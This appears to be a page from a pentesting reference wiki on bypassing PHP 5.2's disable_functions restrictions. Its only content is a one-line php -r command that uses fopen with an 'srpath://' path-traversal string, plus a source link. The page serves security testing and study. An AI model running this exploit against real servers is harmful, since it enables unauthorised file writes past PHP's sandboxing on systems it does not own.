🖌️
Resources For Pentesting
Search...
Ctrl
K
Pentesting
80,443 - Pentesting Web Methodology
PHP Tricks (SPA)
PHP - Useful Functions & disable_functions/open_basedir bypass
disable_functions bypass - PHP 5.2 - FOpen Exploit
Previous
disable_functions bypass - PHP 5.2.3 - Win32std ext Protections Bypass
Next
disable_functions bypass - via mem
Last updated
3 years ago
PHP 5.2 - FOpen Exploit
From
Copy
php -r 'fopen("srpath://../../../../../../../dir/pliczek", "a");'
http://blog.safebuff.com/2016/05/06/disable-functions-bypass/